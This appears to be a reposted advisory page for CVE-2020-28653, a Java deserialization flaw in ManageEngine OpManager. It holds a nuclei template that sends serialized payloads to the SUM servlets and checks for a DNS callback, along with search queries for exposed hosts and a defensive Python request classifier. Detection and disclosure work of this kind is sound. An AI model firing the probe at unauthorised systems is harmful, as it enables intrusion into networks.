ManageEngine OpManager SumPDU Java Deserialization Vulnerability

Vulnerability Information

Vulnerability name: ManageEngine OpManager SumPDU Java Deserialization Vulnerability

Vulnerability ID:

  • CVE: CVE-2020-28653

Vulnerability type: Deserialization

Severity: Critical

Vulnerability description: ManageEngine OpManager is a widely used network monitoring and management product for enterprise environments, providing comprehensive network performance monitoring, fault management and configuration management. It is deployed in organizations of all sizes for real-time monitoring and management of network devices and services.

The vulnerability lies in the Smart Update Manager component of ManageEngine OpManager, specifically in an HTTP endpoint that can be used to deserialize arbitrary Java objects. Because the input is not properly validated, an unauthenticated remote attacker can exploit it to execute operating-system commands in the context of the OpManager application (NT AUTHORITY\SYSTEM on Windows, root on Linux). This is a deserialization vulnerability; its technical root cause is that the application performs no strict security checks when processing serialized objects.

The impact is extremely severe because it allows an attacker to execute arbitrary code on affected systems, potentially leading to complete system takeover. Since no authentication is required, the bar to exploitation is low and the risk is very high. Moreover, because OpManager is typically deployed on internal networks, a successful exploit could let an attacker pivot further into the internal network, creating a much broader security threat.

Vendor: zohocorp

Product: ManageEngine OpManager

Affected versions: 12.1 - 12.5.232

Search syntax: title="opmanager plus" OR title="opmanager"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/00c05f4901ae712b72d1d99b90e3d1fd53317ffe/http%2Fcves%2F2020%2FCVE-2020-28653.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC Details


```yaml
id: CVE-2020-28653

info:
  name: ManageEngine OpManager SumPDU 12.1 - 12.5.232 - Java Deserialization
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    An HTTP endpoint used by the Manage Engine OpManager Smart Update Manager component can be leveraged to
    deserialize an arbitrary Java object. This can be abused by an unauthenticated remote attacker to execute OS
    commands in the context of the OpManager application (NT AUTHORITY\SYSTEM on Windows or root on Linux). This
    vulnerability is also present in other products that are built on top of the OpManager application. This
    vulnerability affects OpManager versions 12.1 - 12.5.232.
  reference:
    - http://packetstormsecurity.com/files/164231/ManageEngine-OpManager-SumPDU-Java-Deserialization.html
    - https://github.com/AdeliaNitzsche/Java-Deserialization-Cheat-Sheet
    - https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet
    - https://github.com/HimmelAward/Goby_POC
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-28653
    epss-score: 0.80604
    epss-percentile: 0.99072
    cpe: cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:*
  metadata:
    vendor: zohocorp
    product: manageengine_opmanager
    shodan-query:
      - http.title:"opmanager plus"
      - http.title:"opmanager"
    fofa-query:
      - title="opmanager plus"
      - title="opmanager"
    google-query:
      - intitle:"opmanager plus"
      - intitle:"opmanager"
  tags: packetstorm,java,deserialization,rce,opmanager,demo,intrusive

variables:
  oast: ".{{interactsh-url}}"
  payload: "{{padding(oast,'a',50,'prefix')}}"

http:
  - raw:
      - |+
        POST /servlets/com.adventnet.tools.sum.transport.SUMCommunicationServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream

  - raw:
      - |-
        POST /servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream

        {{base64_decode('rO0ABXcEAAAD6g==')}}

    matchers:
      - type: dsl
        internal: true
        dsl:
          - "status_code == 200"

  - raw:
      - |-
        POST /servlets/com.adventnet.tools.sum.transport.SUMCommunicationServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream

        {{replace(base64_decode('AAABX6ztAAVzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAMdwgAAAAQAAAAAXNyAAxqYXZhLm5ldC5VUkyWJTc2GvzkcgMAB0kACGhhc2hDb2RlSQAEcG9ydEwACWF1dGhvcml0eXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wABGZpbGVxAH4AA0wABGhvc3RxAH4AA0wACHByb3RvY29scQB+AANMAANyZWZxAH4AA3hw//////////90ADJhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYXQAAHEAfgAFdAAEaHR0cHB4dAA5aHR0cDovL2FhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFheA=='),'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa', payload)}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
```
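From the detection side, the two request bodies in the template are easier to reason about once decoded. The following added example (my own code, not part of the nuclei template or of the vendor's product) classifies a POST the way a WAF or IDS rule could: it spots Java serialization magic reaching the SUM servlets, tolerates the 4-byte length prefix the second body carries, and lifts class names out of the stream without deserializing anything. The servlet paths and both base64 blobs are taken from the template above; the verdict labels are assumptions of mine.

```python
import base64
import re
import struct

JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"   # first bytes of every java.io.ObjectOutputStream
SUM_SERVLET_PREFIX = "/servlets/com.adventnet.tools.sum.transport."
# TC_CLASSDESC (0x72) is followed by a 2-byte length and the UTF-8 class name.
CLASS_NAME = re.compile(rb"^[A-Za-z_$][A-Za-z0-9_$.]*$")

# Sample bodies decoded from the template above (handshake blob and HashMap/URL probe).
HANDSHAKE = base64.b64decode("rO0ABXcEAAAD6g==")
GADGET = base64.b64decode("AAABX6ztAAVzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAMdwgAAAAQAAAAAXNyAAxqYXZhLm5ldC5VUkyWJTc2GvzkcgMAB0kACGhhc2hDb2RlSQAEcG9ydEwACWF1dGhvcml0eXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wABGZpbGVxAH4AA0wABGhvc3RxAH4AA0wACHByb3RvY29scQB+AANMAANyZWZxAH4AA3hw//////////90ADJhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYXQAAHEAfgAFdAAEaHR0cHB4dAA5aHR0cDovL2FhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFheA==")


def find_java_stream(body: bytes) -> int:
    """Offset of the serialization magic: 0 if bare, 4 if preceded by the
    4-byte big-endian length prefix the SUMCommunicationServlet body uses, else -1."""
    if body.startswith(JAVA_STREAM_MAGIC):
        return 0
    if len(body) >= 8 and body[4:8] == JAVA_STREAM_MAGIC:
        return 4
    return -1


def class_names(stream: bytes) -> list:
    """Collect class names at TC_CLASSDESC markers without deserializing. A stray
    0x72 ('r') inside a string is rejected because its 'length' runs past the stream."""
    names, i = [], stream.find(b"\x72")
    while i != -1:
        if i + 3 <= len(stream):
            n = struct.unpack(">H", stream[i + 1:i + 3])[0]
            name = stream[i + 3:i + 3 + n]
            if n and len(name) == n and CLASS_NAME.match(name):
                names.append(name.decode())
        i = stream.find(b"\x72", i + 1)
    return names


def inspect_request(path: str, body: bytes) -> dict:
    """Verdicts (assumed labels): 'clean'; 'serialized-to-sum-servlet' for any object
    stream hitting the endpoint; 'url-hashmap-gadget' when a java.net.URL key is present
    (its hashCode() resolves the host, which is what the DNS matcher above observes)."""
    off = find_java_stream(body)
    classes = class_names(body[off:]) if off >= 0 else []
    verdict = "clean"
    if path.startswith(SUM_SERVLET_PREFIX) and off >= 0:
        verdict = "url-hashmap-gadget" if "java.net.URL" in classes else "serialized-to-sum-servlet"
    return {"path": path, "length_prefixed": off == 4, "classes": classes, "verdict": verdict}
```

The handshake body is a bare stream with no class descriptors at all, while the probe body is length-prefixed and names java.util.HashMap and java.net.URL; after patching, any non-allowlisted class reaching these paths is still worth an alert.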



http://example.com/2025/07/08/github_1814476453/
Author: lianccc
Published: July 8, 2025